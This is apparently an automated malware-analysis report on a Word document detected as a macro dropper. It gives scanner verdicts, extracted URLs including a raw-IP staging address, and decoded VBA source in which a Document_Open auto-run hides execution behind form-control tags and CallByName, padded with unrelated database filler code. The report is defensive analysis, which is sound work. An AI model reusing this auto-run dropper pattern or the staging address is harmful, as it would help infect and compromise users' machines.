Verdict: MALICIOUS
Risk Score: 290
Heuristics: 9

- ClamAV: Doc.Dropper.Agent-6937918-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6937918-0
- Malformed OLE auto-open stager with embedded ZIP payload (critical, OLE_RAW_MALFORMED_AUTOOPEN_STAGER): Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
  - CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set DOBIBOR = CreateObject("" + WINDOWS5.Label2.Tag & "")`
  - CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call. Matched line in script: `CallByName DOBIBOR, "R" + "un", VbMethod, WINDOWS5.Label55.Tag & Chr(32) + " ACX=CHR(10) " & WINDOWS5.Tag + " " & " DGH=CHR(13) ", 0, False`
  - Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `Sub Document_Open()`
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://79.141.171.160/alg: in document text (OLE body)
  - http://ocsp.sectigo.com0: in document text (OLE body)
  - http://ocsp.usertrust.com0: in document text (OLE body)
  - http://ns.adobe.com/xap/1.0/: in document text (OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#: in document text (OLE body)
  - http://ns.adobe.com/photoshop/1.0/: in document text (OLE body)
  - http://purl.org/dc/elements/1.1/: in document text (OLE body)
  - http://ns.adobe.com/xap/1.0/mm/: in document text (OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#: in document text (OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#: in document text (OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
  - https://sectigo.com/CPS0C: in document text (OLE body)
  - http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s: in document text (OLE body)
  - http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#: in document text (OLE body)
  - http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v: in document text (OLE body)
  - http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%: in document text (OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (🔏 Signed: VBA project digital signature) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10241 bytes |

SHA-256: 050e090a832298e844fe9272ffb40cf31d5abafbd8fec87840e280be4e3cdd05

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function getQuestionId() As Integer
getQues.tionValue "id"
End Function
Public Function getQuestionId2() As Integer
getQuest.ionValue "id"
End Function
Sub Document_Open()
Dim currentPi0 As Object
Dim currentPi7 As Object
Dim currentPi11 As Object
Dim currentPi12 As Object
Dim c As New Class1
c.PowerOn
Dim currentPi5 As Object
Dim currentPi6 As Object
Dim currentPi9 As Object
ActiveDocument.Close False
getQuestionId
Application.Quit False
End Sub
Public Sub fill(dgv)
Dim adapter
Dim dataset
connection.Open
adapter = SqlData.adapter(command)
dataset = dataset
adapter.fill (dataset)
If dataset.Tables.Count > 0 Then
dgv.Refresh
dgv.DataSource = dataset.Tables(0)
End If
MsgBox (ex.Message)
Thr.ow ex
If connection.State = ConnectionState.Open Then
connection.Close
End If
End Sub
Sub LoadQuestions()
db.fill (dgvQuestions)
End Sub
Sub LoadToolStripMenuItem_Click(sender, e)
Hand.les LoadToolStripMenuItem.Click
LoadQuestions
End Sub
Sub printenrolleedepentall()
Try
Dim connection As SqlConnection
Dim command As SqlCommand
Dim adapter
Dim dataset
s_sqlcmd1 = "SELECT code1, company, address, address2, tel, Web, email FROM companytab"
s_sqlcmd2 = "SELECT enrolleeid, Surname, Firstname, othernames, dregister, sdate, edate, active, nationalid,NHIS, ogaid, hcpid, hcpname, ugstodate,sectortype FROM enrolleetab where Active = '" & False & "'"
connection = SqlConnection(My.Settings.cnnstring)
connection.Open
' load the table with headers into the dataset
command = SqlCommand(s_sqlcmd1, connection)
adapter.SelectCommand = command
adapter.fill dataset, "companytab" ' tablename *MUST* match with the tablename used in the report
' load the 2nd table into the dataset (lines)
adapter.SelectCommand.CommandText = s_sqlcmd2
adapter.fill dataset, "enrolleetab"
' define the relation between the tables
' dataset.Relations.Add("relation", dataset.Tables("bill_headers").Columns("billnr"), dataset.Tables("bill_lines").Columns("parent_billnr"))
' dataset is ready, get rid of the objects used to construct it
adapter.Dispose
command.Dispose
connection.Close
' Load the defined report with the dataset we just created
Dim myreport As ReportDocument
myreport = New ReportDocument
myreport.Load (My.Settings.Rptpath & "\" & "Enrodep3.rpt")
myreport.SetDataSource (dataset)
' bind viewer
' CrystalReportViewer1.DisplayGroupTree = False
CrystalReportViewer1.ReportSource = myreport
CrystalReportViewer1.RefreshReport
CrystalReportViewer1.Show
CrystalReportViewer1.Refresh
MessageBox.Show (Excep.Message)
End Sub
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub PowerOn()
Application.Run WINDOWS5.Label3.Tag
End Sub
Function VerifySysInt(ByVal si As Byte) As Boolean
Dim s As Integer
Dim i As Integer
s = 0
For i = 0 To 254 '&HFB
s = (s And &HFF) + si(i)
Next
s = s And &HFF
If s = si(255) Then
VerifySysInt = True
Else
VerifySysInt = False
End If
End Function
Attribute VB_Name = "Module1"
Function MakeLong(ByVal extb, ByVal offset As Integer, ByVal sz As Integer) As Double
Dim i As Integer
Dim l As Double
Dim neg As Double
On Error Resume Next
MakeLong = 0
If sz = 3 Then
If extb(offset) >= 128 Then
extb(offset) = 128
neg = -1#
End If
MakeLong = ((extb(offset) * (256 ^ 2)) + (extb(offset + 2) * (256 ^ 1)) + extb(offset + 1)) * neg
End If
If sz = 4 Then
MakeLong = (extb(offset + 1) * (256 ^ 3) + extb(offset) * (256 ^ 2)) + (extb(offset + 3) * (256 ^ 1)) + extb(offset + 2)
End If
'For i = 0 To sz - 1
' l = extb(sz - 1 - i + offset)
' MakeLong = MakeLong + l * (256 ^ (i))
'Next
End Function
Public Sub PriceCount()
Dim PathTo1 As String
Dim DOBIBOR As Object
Dim eighteen101 As Object
Dim eighteen103 As Object
Dim eighteen109 As Object
Dim eighteen10 As Object
Set DOBIBOR = CreateObject("" + WINDOWS5.Label2.Tag & "")
Dim eighteen105 As Object
Dim eighteen106 As Object
Dim eighteen100 As Object
Dim eighteen107 As Object
On Error Resume Next
Dim eighteen1011 As Object
Dim eighteen1012 As Object
Dim eighteen104 As Object
Dim eighteen1034 As Object
Dim eighteen108 As Object
CallByName DOBIBOR, "R" + "un", VbMethod, WINDOWS5.Label55.Tag & Chr(32) + " ACX=CHR(10) " & WINDOWS5.Tag + " " & " DGH=CHR(13) ", 0, False
End Sub
Sub Prininvoice()
' MessageBox.Show(rptrangecode)
Try
Dim MyCommand As New SqlCommand
Dim myDA As New SqlDataAdapter
Dim myDS As New reportdata2 'The DataSet you created.
Dim cryRpt As New ReportDocument
cryRpt.Load (My.Settings.Rptpath & "\" & "invoicereport.rpt")
MyCommand.connection = myConnection2 'AND OP1 = '" & "F7" & "' "
MyCommand.CommandText = "select * from(select a.billcode,a.descr,a.invoicetopic,a.tdate,a.invoiceno,a.glcode,a.Amtword,a.salesrep,a.stax,a.itotal,a.netdue,a.addressto,a.signby,b.pcode,b.eqty,b.uprice,b.tax,b.discount,b.amt,c.company,c.address,c.address2,c.tel,a.accountname,a.accountno,a.bankname,a.branch,a.sortno from salesinvoicerpt a, sinvoicegridrpt b,companytab c Where rtrim(a.invoiceno) = rtrim(b.invoiceno) and rtrim(a.invoiceno) = '" & RTrim(rptrangecode) & "')school"
MyCommand.CommandType = CommandType.Text
myDA.SelectCommand = MyCommand
myDA.fill myDS, "school"
cryRpt.SetDataSource (myDS)
CrystalReportViewer1.ReportSource = cryRpt
CrystalReportViewer1.RefreshReport
CrystalReportViewer1.Show
CrystalReportViewer1.Refresh
'Try
'Dim cryRpt As New ReportDocument
'cryRpt.Load(My.Settings.Rptpath & "\" & "invoicereport.rpt")
'CrystalReportViewer1.ReportSource = cryRpt
'CrystalReportViewer1.Refresh()
'Catch ex As Exception
' MDIParent1.statusmsg.Text = ex.Message
'End Try
Catch
MessageBox.Show (Excep.Message)
End
End Sub
Sub printenrolleedepentsector()
Try
Dim connection As SqlConnection
Dim command As SqlCommand
Dim adapter As New SqlDataAdapter
Dim dataset As New dataset
s_sqlcmd1 = "SELECT code1, company, address, address2, tel, Web, email FROM companytab"
s_sqlcmd2 = "SELECT enrolleeid, Surname, Firstname, othernames, dregister, sdate, edate, active, nationalid,NHIS, ogaid, hcpid, hcpname, ugstodate,sectortype FROM enrolleetab where Active = '" & False & "' and sectortype = '" & rptrangecode & "'"
connection = SqlConnection(My.Settings.cnnstring)
connection.Open
' load the table with headers into the dataset
command = SqlCommand(s_sqlcmd1, connection)
adapter.SelectCommand = command
adapter.fill dataset, "companytab" ' tablename *MUST* match with the tablename used in the report
' load the 2nd table into the dataset (lines)
adapter.SelectCommand.CommandText = s_sqlcmd2
adapter.fill dataset, "enrolleetab"
' define the relation between the tables
' dataset.Relations.Add("relation", dataset.Tables("bill_headers").Columns("billnr"), dataset.Tables("bill_lines").Columns("parent_billnr"))
' dataset is ready, get rid of the objects used to construct it
adapter.Dispose
command.Dispose
connection.Close
' Load the defined report with the dataset we just created
Dim myreport As ReportDocument
myreport = New ReportDocument
myreport.Load (My.Settings.Rptpath & "\" & "Enrodep3.rpt")
myreport.SetDataSource (dataset)
' bind viewer
' CrystalReportViewer1.DisplayGroupTree = False
CrystalReportViewer1.ReportSource = myreport
CrystalReportViewer1.RefreshReport
CrystalReportViewer1.Show
CrystalReportViewer1.Refresh
MessageBox.Show (Excep.Message)
End Sub
Attribute VB_Name = "WINDOWS5"
Attribute VB_Base = "0{2685ADE8-8692-49B9-8CE5-EFC8D03F2070}{780488BF-578B-4551-9E02-FFF5D3D52865}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module2"